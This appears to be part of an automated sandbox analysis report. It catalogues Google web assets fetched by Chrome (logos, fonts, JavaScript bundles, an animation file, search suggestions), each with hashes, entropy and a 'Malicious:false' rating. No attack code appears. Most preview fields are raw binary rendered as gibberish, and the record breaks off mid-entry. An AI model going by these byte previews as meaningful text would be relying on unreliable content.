                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/sq57GaRCOEk-TcLHr8ZeehZOkRrOLLv0ZIL34gOO2TNqeQjAcLqZM_YvwoZCLFQbW1DS0K28QakL4JTKArVVV4pp-PtTltns7K25Pu5d7v-6dRSh-g=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................5....".........................................].........................!..1AQ."aq.2.....#BR..br....$3S......Ccs..4d.....%Dt.....T5E.......................................H.........................!1AQ.."aq..2......#BR..3b..$Cr.....4S...Dc.T%............?..N.W..A.`..uH.p.J.hg.Qx.../8.....}.R...D..,.{9K.......d.5..6DD-.o..Jv2L....Sm..5L-..h.e.Q.?%..pyX.....[1....,D..B(..p.%{.`..1..I.........+.."....+...b..E.8~..I. ..]n..S.........e5.Q.s.'E./j.l...]..9.cnsnO..x.&[1p.....SPenN".jwT..F.G6P.n...!.w.i.ev.=....q.fi.e.[k..w...d.H.8....96...gy.pA...'.=...E.s.z..5...N..4E$...%.......A-MT.B..o}....f....b...i.L[G.Y.L1-...g......r(n........Z...#PlT.h..EVTM..C6.o~.S.l..w.(v.U\.x.../X..N. ...s.....h3......M...N.UEC.!a.. [..../x...j...i.Y..4.d.....6.f#k...Bl...s.d]..p/..h..g#3o.+|3......s*..1..[..<..$Z..*..i..+wl..H^
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18038)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):18043
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.071225548366322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:xKooO7FErdkUgDoIvdaCPn2F0V9R4hs+k84UIKXgUc3syWLhI1N4FKgjV:xRjFEp+DFv3E0t4hs+k8LXgLsyWSiR
                                                                                                                                                                                                                                                                                          MD5:4E016795A5D4ACB0F42F08DF93B05957
                                                                                                                                                                                                                                                                                          SHA1:BC6F0A8F4B40624916E86A4435A89F651EBBD7D7
                                                                                                                                                                                                                                                                                          SHA-256:89E71AEED0B90DA78F3CEDE1CFA0D313AD1B1763481E125F2C2C0752BCDCCB8E
                                                                                                                                                                                                                                                                                          SHA-512:1F76EB17366ED87FDF25CE821223B2608F148CFF700E7FD4538D22AEEC7E5166D0D44A4D5FD3108C3190BAB38C5F426D15404FFA2723E1783CF4D1FA91BD9FAF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:)]}'.[[["brazilian blimp crash",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["pittsburgh steelers",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"Pittsburgh Steelers","zi":"Football team","zl":8,"zp":{"gs_ssp":"eJzj4tDP1TcwLUnLNWD0Ei7ILCkpTiotSs9QKC5JTc1JLSoGAJ_sCus"},"zs":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAMAAAC5zwKfAAAA+VBMVEX///+lrK8AU5vurR7GDDAAAACss7aepqmpsLOiqaztqQD8/PztpgAAT5nY2Nj29vYAQ5TEAB4AQJPr6+vR1NXOzs7j4+NXVla0tLTuys3FACnEACJdXV27u7vDABmlpaWBgYEASpeMi4s6OTkzMjEaHh9OUlSBh4lfZGZ2e33yxHH21aD10Zb++fIrLjDsoAD77NXlqrAUExLaf4mZmZnUZXLAAABDQ0PP2Oa6x9tsbGz54r3xvmH32qzvtD7wuU/0yoP24eTKNEjWcX3QVWTIIz3qvcLNQVPdkJeQpcdVfK9+mb9tjLg7aqbd5O3hnaQlXqCoudIAKouECGyYAAAGnklEQVRYhb1Y/XuaOhRGJBBEwaogteBnRVmta5lVS9dt3e26ubXdx///x9xAQkj40Hb3ee77QwtJeD0fOScnRxD+bxjmYBx2J6enk244HpjGfyNzw2DqhbOVUoGwoqxmoTcNQvtvSe1NMB9DGSIuAvQow9U82Njaq9naQzBX5JQrBSJV5mDYfh1dGMzkAjJKKs8C5xWUQ7CXjlCC4QvpTODzdCoFT+kD9yV84WmFoVMVpeKaHR2hY7pQURhSWJmEB+nagS8zbNC0iEPP479auwMZTtkPDljSBAoVT
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):527079
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.73994273564716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:uUvI7MKQuoU7oOg88erIG8rmm2P4WvRwRcMvRfRc2vRMRczvb4A6jXc1C8AutAA0:lv0pQs7oG
                                                                                                                                                                                                                                                                                          MD5:02E3FFB3DE7B329CC362662939D1F2E3
                                                                                                                                                                                                                                                                                          SHA1:2F433DDFFADCF48AB9616DFD55A3C6886AEAD92E
                                                                                                                                                                                                                                                                                          SHA-256:9F1956B28693524B36494972F16BA2B9A638FBFDA21C2A3CCE489C359842A9E1
                                                                                                                                                                                                                                                                                          SHA-512:9302A81257C63028F9B6BE7DAE8A9B560932A87DE2AADAC8752F7489596B5B4D15165EC29F60FE03053B5009CAE95E36F9E4FB51DA0C60E9316D5F5CA6DEE3E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"v":"4.8.0","meta":{"g":"LottieFiles AE 3.4.5","a":"","k":"","d":"","tc":""},"fr":30,"ip":0,"op":150,"w":304,"h":250,"nm":"Mobile - Gmail Product update - Emoji animation","ddd":0,"assets":[{"id":"image_0","w":326,"h":83,"u":"","p":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABTCAYAAADju65sAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAGKLSURBVHgB7b0JgGZFdS9+7vLtX+/dsy8wC8iwgyIBgQEHNSbkGaIY44YmbsS8mBijiTFCln8SfUbznkHF5D3zjyvEFRM3DCAKyj4DM8Aw+9Ld0/v27Xd5v1/dW1/f7/bXPdMz3WPy0gd6vnvrVp06dc6pU6dO1a0rsgRLsARLsARLsARLsARLMBcY8nMG3/cNgE9acK1+mc403uJX5dH5w3tVNLhV+aJl9HW9ikg94usKAxwSrVsji5BnxOrUeP3I8zr+GA2+pkHXHV430BXBX8cVZvYj7Z7RVp3eBO9cMvWP9zxKS7Tds9ApEbYZTepoWl+TdsTr1vcNfIjKT+eJ6U9dVvE6ZkuPPg8RNtMxfS3NyjZpU4Mea9ri9UhMrnH9jelKXD3julFnSLzuKD1ROmL8kkbVb2xHrE31emLti9YXJdiI8beeb67+Lz9HMOU0Qcg4I5ZmRH8jCq/B0IyLG4DbbrvNxJ8SCH/5/NZbbzVj9ak0/kUEb+DeiNOgaSPekBQjjiuqENFyuq+GRRrw6HzROnW5SP6o8qo2RdsS4pJoPWxz2BYzrMNgviivZrJT6uXjeWK0RI2g5kVDm1lX7F7jrpdvIk+JtyNKm5aTRuEHUM+r5Rfy
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3170
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.934630496764965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:c2ZEPhMXQnPkVrTEnGD9c4vnrmBYBaSfS18:c2/XQnPGroGD9vvnXVaq
                                                                                                                                                                                                                                                                                          MD5:9D73B3AA30BCE9D8F166DE5178AE4338
                                                                                                                                                                                                                                                                                          SHA1:D0CBC46850D8ED54625A3B2B01A2C31F37977E75
                                                                                                                                                                                                                                                                                          SHA-256:DBEF5E5530003B7233E944856C23D1437902A2D3568CDFD2BEAF2166E9CA9139
                                                                                                                                                                                                                                                                                          SHA-512:8E55D1677CDBFE9DB6700840041C815329A57DF69E303ADC1F994757C64100FE4A3A17E86EF4613F4243E29014517234DEBFBCEE58DAB9FC56C81DD147FDC058
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(..*.N_R."0`.-.A..|.*N..`....n..{.&..l.o..;.....a....d..$.................J.1.*.....7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4|.F...9......pP.8.|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}*......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (867)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1381
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.405763853125201
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:LHlnIZO5jvu88gakBeOtaO5M1QmwFyTzjIdPnU3Y4vaglcl76dMMSJR5dsb7bO:t5FG885kBfda1Q8T3IdnUQOcIdMMSJJR
                                                                                                                                                                                                                                                                                          MD5:54A639674E3A0C838A7C4EA38CA9FF5F
                                                                                                                                                                                                                                                                                          SHA1:07A5E1E5A27C3010C6CF674B16B8A842631E34EB
                                                                                                                                                                                                                                                                                          SHA-256:099445A35EDBBDE5C92A42C0C06012C0F85D8499F52B138C12FA22696F732429
                                                                                                                                                                                                                                                                                          SHA-512:18EC129ACB13642BAA3149AA60982A2AC2334B4892A52691A4CEFFE6E6287F64CB5BD1ACBE8018372732623DD0011A09AFB636DBDF1E8DFA5E1369022E9353D5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{T as h}from"./ycaG4YXp.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const a={ATTRIBUTE:1,CHILD:2,PROPERTY:3,BOOLEAN_ATTRIBUTE:4,EVENT:5,ELEMENT:6},d=e=>(...t)=>({_$litDirective$:e,values:t});class l{constructor(t){}get _$AU(){return this._$AM._$AU}_$AT(t,s,r){this._$Ct=t,this._$AM=s,this._$Ci=r}_$AS(t,s){return this.update(t,s)}update(t,s){return this.render(...s)}}/**. * @license. * Copyright 2018 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const u=d(class extends l{constructor(e){var t;if(super(e),e.type!==a.ATTRIBUTE||e.name!=="class"||((t=e.strings)===null||t===void 0?void 0:t.length)>2)throw Error("`classMap()` can only be used in the `class` attribute and must be the only part in the attribute.")}render(e){return" "+Object.keys(e).filter(t=>e[t]).join(" ")+" "}update(e,[t]){var s,r;if(this.it===void 0){this.it=new Set,e.strings!==void 0&&(this.nt=new Set(e.strings.join(" ").split(/\s/).filter(i=>i!=="")));for(c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (11167)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):15582
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214914407283781
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBDApNA8O3u3D2YMBPaUOI2scu1K3LqNRP8qm:rDAVD22UOqcu1K3LqNuqm
                                                                                                                                                                                                                                                                                          MD5:4CFB45F3658A8849C5D078DB5D432601
                                                                                                                                                                                                                                                                                          SHA1:BA9EE0585E594388713796535F037BC5A363E205
                                                                                                                                                                                                                                                                                          SHA-256:ACE3B863248663AE1AA299D5F176B0AFBA874012D5F12BC1DCD8972CFD9B3654
                                                                                                                                                                                                                                                                                          SHA-512:3637A5F14B289998398FAFFF733A85A502552E65F14F8913EBED2B540B2852DADFE4FD3DDADDB81013E8AF004535B495B7291E9ABAFA5B8674F34CDE19169C09
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{A as l,x as k,r as $,s as C}from"./ycaG4YXp.min.js";import{e as S}from"./0XPwTFcg.min.js";import{n as i}from"./IYoTYjYE.min.js";import{e as _}from"./p9kcPq91.min.js";import{o as N}from"./5Ss99t85.min.js";import{o as I}from"./RpI-OtYr.min.js";import{Y as P}from"./rwBjrn-0.min.js";import{R as E}from"./bAPu5B1A.min.js";import{r as v}from"./lHimDk5Y.min.js";/**. * @license. * Copyright 2018 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const c=t=>t??l;/**. * @license. * Copyright 2020 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const y=Symbol.for(""),j=t=>{if(t?.r===y)return t?._$litStatic$},g=(t,...o)=>({_$litStatic$:o.reduce((n,e,a)=>n+(u=>{if(u._$litStatic$!==void 0)return u._$litStatic$;throw Error(`Value passed to 'literal' function must be a 'literal' result: ${u}. Use 'unsafeStatic' to pass non-literal values, but. take care to ensure page security.`)})(e)+t[a+1],t[0]),r:y}),m=new Map,z=t=>(o,...n)=>{const e=n.length;let a,u;const h=[],w=[];let
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 35060, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):35060
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9934247518702914
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:VWgzOJq8VMlI+d620JaSUhkJN1tLmkLqnEsKeeBClx7styedpa12:dSJBVMlfd6VJaSUCv1RmkavKetUXnZ
                                                                                                                                                                                                                                                                                          MD5:0360DBC6E8C09DCE9183A1FD78F3BE2E
                                                                                                                                                                                                                                                                                          SHA1:6CD4B65A94707AE941D78B12F082C968CB05EC92
                                                                                                                                                                                                                                                                                          SHA-256:2DB6BC36808D43FA89029C652636E206FA3E889B35ECF71814AB85F8BA944AF3
                                                                                                                                                                                                                                                                                          SHA-512:93C9F1856142DA0709F807CA3E5836065E61BC8160F9281FEC9244F31ED8AE8DF500CD5C64048AC59B4DBC36EBD18BA8E7FBCEEF58134DD76441079FAE147AB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............u$..............................T....`..P.l..a.....D..;.."......6.$..@. ..,..6...[.]q..}:P..(....W.(........(;h 8..r.o...........k..........>..eZT\K.....4l..Z]...1B.1.G.....|..p..._..S/...^I.e..l.=.I1...0..L./..D..Y{.w...*.(.....Q..J....v.........z......Q/.K..f._...-..T.f...[..U.).>.K35v...n.?-thr......w.?[D.u.Q.}..i_.cp..0E.R5m.>I.......x......H."C,....2...q...E..r.?...R../.J..m..X97...E.fJ...=.Q.>..`.QXuw..e."........\^.....~....>M.....h.Q.-.......SM,;W......#..#.B.....K.o...`...z...t....".$..s....o.v...w.I.mg.$n....../...N.....8H........^.~....X.Q.,YB.U...uX.e.o.l..o.2f..^_].~.3w*........J$2)_.c8...&^.>...r.29.D&.I....T".H....O.2.$..r.\...1.}.ES~5...t.X`.x.gQk..e.L.N......{.6...4..G.....2.z...V...Vy.'..../.....'...z..i.G.......`...$@.k......1.....{PH.....qf......_...A.e..7.....C.?.^.....,......NDa<b..*F...:.....+..|.._I+.2.^......l...3..^.)qJ...0.....X.....yj....J"...lo..._j...Z...0...m..2.$.EBa.....w...|..2&!.$..!S/^'..*...r.U-.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4066
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.926723169206676
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AokAGwRQ/g+rwCoqz/ECXKIb+m+qF8piSDM366vyf:AoTGwG/nrDv3bTl1yf
                                                                                                                                                                                                                                                                                          MD5:BB7173B2DC2B06268760ADBDD2E02967
                                                                                                                                                                                                                                                                                          SHA1:DEA468D477B7A1A2CF1FEFBC7BFB24E9BDC037A4
                                                                                                                                                                                                                                                                                          SHA-256:830827B9BB0A261C1AB505DC61917202683E55C9A94FE3DB743C38172308B4DC
                                                                                                                                                                                                                                                                                          SHA-512:6279A7185FBD7F0DC996B99D37E78616A5FBB4E008C7A6B3E79C5B73B9529A999DB6A1B7D65E4C4031E9B8DA03FA9EB00F0BB303CD9E9CFF4FADB411F88215F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/3a/3c/a57e14f642cda623fb5210534c5b/image-280.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......Em.!I....m...3k.m..w.l.......:'*+.......!.m#I...F.....'.......f..G^|..W.\W\q.E...c.......P[..~Q.fV.._>.D.._ r=......v..]`>.V.kVd..9..z.X&..?..I[......<.".o........}TSD..`.o...._+.....+d...&.|y...z.l..... ..2.W...._a(<-w.*....@ G~.\t..z.|..n|...b.)~.t<5.bk...vz......)..oM.c.=c..BQ..sG..|....).7....~.g....$.@.XS......_..;^6........2~.+~D...B...\9{..yQs..M.........{K..}..5.P....C8/zn.t..-.%`....w....}).X.k....-f..i.i..T.s..-........MV.6.2P.f...e....}.$e.o{.$......_.G..."}...R...l....~...N.V.M.....[n..v7..Q.G."j..(..Ni.....I...{...[u.....J{_.;~.?F4..$. ~.%...P..K..o..b..S._..B....j....y.R..u..|4..r.ftR..R.Lh.............W3...C...W3.KX.....W...cB9.T.._..k..W...%..W...j.>~..M..m..h..d.....og....y.,.......o.E#..>$......Q!.{..863...OP...X........B.noM.....o..3...L.......e.jg04..~.C..4O..............8x6A.;05+.(.........s;.C.8......_%....o._.~+...$.(~.....&..p?.[...QQ!..lp..Y....k|......2.g.Us..e.&
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (621)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1037371
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.72011339003185
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:2tM6FS0I/5oUqc2FfvsSkatCfYSxVU//5w+ClaFM:So0I/5obc2ZvsSkuCfYSxVU//5w5A6
                                                                                                                                                                                                                                                                                          MD5:2E22304243F98E7B11989499D25C207A
                                                                                                                                                                                                                                                                                          SHA1:8A0E14BF15B3C1086331C2A294B879FC470204A0
                                                                                                                                                                                                                                                                                          SHA-256:B2DAB393D890FCADAF4FD1176A5AA22A45363580BE3B2C870BEF18A085BC336D
                                                                                                                                                                                                                                                                                          SHA-512:F17EF57A20D880CF35A89FB5DF75D17408D52BBBA407A81D700DD67CF83C70FC99C3C901D0EB5374C639021F4E9DA5D3A87E39D143524817A268EADDFDEF574E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,caa,naa,Aaa,Caa,Iaa,Taa,$aa,iba,kba,mba,nba,rba,sba,xba,Cba,Fba,Hba,Iba,Lba,Kba,Eba,Ta,Oba,Sba,Tba,Uba,Yba,aca,bca,dca,eca,fca,hca,ica,jca,kca,oca,qca,sca,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,tea,uea,yea,zea,Eea,Gea,Nea,Oea,Qea,xea,Bea,Uea,Yea,efa,ifa,jfa,rfa,ofa,sfa,ufa,yfa,zfa,.Afa,Cfa,Dfa,lfa,Ffa,Hfa,Lfa,Nfa,Ufa,Zfa,aga,kga,mga,oga,pga,yga,Aga,Dga,Fga,Gga,Iga,Kga,Oga,Pga,Rg
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1219
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):585
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.5846961799152
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XmH0Cr2GaIXUU4BhMMEYvYH43rYYt+nVQznD4c:XmUu2GfXUU38vqqcYtXD4c
                                                                                                                                                                                                                                                                                          MD5:E3D9748C81AC295A0263A704C651AE87
                                                                                                                                                                                                                                                                                          SHA1:328E3DC94CA64D9E613A382505C5EDFFB9EC0978
                                                                                                                                                                                                                                                                                          SHA-256:E6AE5FC86E67466EEF356E093EC4AC198E49DA0E01346093532E28F95450AEF2
                                                                                                                                                                                                                                                                                          SHA-512:3E8D8144640170262C35DFCD19DDDDC7182949E5043EE302396E0E049A77A422D33AABA3895835406E91110F42157BBE71DA057AA1E2F6CA4F5DD3D9EEDB64A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/share.svg
                                                                                                                                                                                                                                                                                          Preview:..........\T.n.0...+...5."E.Q..5...Z......V>?...S.0..jwggH....7.aw...5.t..W..<.?..3..g....8...4Y...xz..|.^~l6..................u...o...`..t:.v..:....v.}....a....GQ.....T{.gd.d...J).1S..#...0FW./.)T...P..h...y..&Q.h.....z^...!..;.;40...tT+..G.F...CXs=...$.C.c.0qK.....Q2.8.g.......!.......H"..*.....#xZ,0e. ...Q..(@.&.\\-...S....x.L.......=.m..\.H..."......,.M..<..|..h.\.b.....E.x.....E...K.G.p..e......@............Y..4;..SlP....r..}.~...~p+.R...|..8:,...Ij....E....i.+.........|._....>d.@..+...<.Q.&KD..w.5"n.+t..............\..|[...............e....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1440x772, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):59482
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996781815118211
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:Mx2JOahGmV1ywxj58sLKcnutY99NmIVChXWL7NIBpjkbcSBasxuxbjQzEO4K2Rr9:oAGmPyEyqutY9mEttxux0S5RzvT68q61
                                                                                                                                                                                                                                                                                          MD5:B7A2BA16E91782E704D09D339B4FECC5
                                                                                                                                                                                                                                                                                          SHA1:59D37A768E15E7C070A3C2C48FBEF153DCD3349F
                                                                                                                                                                                                                                                                                          SHA-256:E9260D215DF7CA7BDA316DA617A4AA85A334BF4547C3330EA08E08E5B6727D16
                                                                                                                                                                                                                                                                                          SHA-512:C07CFE97AA4E388E859E20970E7B4926BB4C78F52B05BC7C62F76D37EB2FD111C6F937EBEDAB3CB9224713D0696701AE3D291753269C74006C4667A0D3551950
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFR...WEBPVP8 F...P....*....>m6.G.&"%'u.....im~...R.k......)..!.W......6?._.W9e-.. h<+........>......Z...g0......B...2.W....~.......?...y.......y.i...*.s...?..._....3...S.>....\......g.;..7...g..O.o.^......#......?y=.....H.....")._._.6@t....|8.9.z...v.j..a.....#..i|...+.xN....._;M...&R.BAT.....5..Bk.8....U....f..qC.7.....1..A.........e?W...SE"....Pd..g.E.u..a#.....8.+uM..(iVqA.......NG2[G..ewcE./.[.s........:....9....|.......^.UW..X.]I.Yd.b..YMQ..2..=.....v..<\..[......5~.]...W.R..+7........!..58...."......8 KM.............]e......5...v..........#.3fv.A.b......I...U....T..X..,...!7..N..D.B...+hX.:;...Y}%8n....Mu..2A..\..Ib....r.c";.er..'...j...-f.3.\2..?..N.&_...Y...)wP.(......0N.b..=......-..>..#( ....XhR.tp.\...A.].V;....7..@....;.3...h..YJn..i;y@....D..Y..v,...|(..L.h;-....T..R.gl........x...5..B^.......Ls)~.o.......W'].....X:.^h,....s.T.b....3S.n.t..$...`..!....0..Vl..O......`^B...S....!..,....I..j.../@..0.......h.h.j......5....C*
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
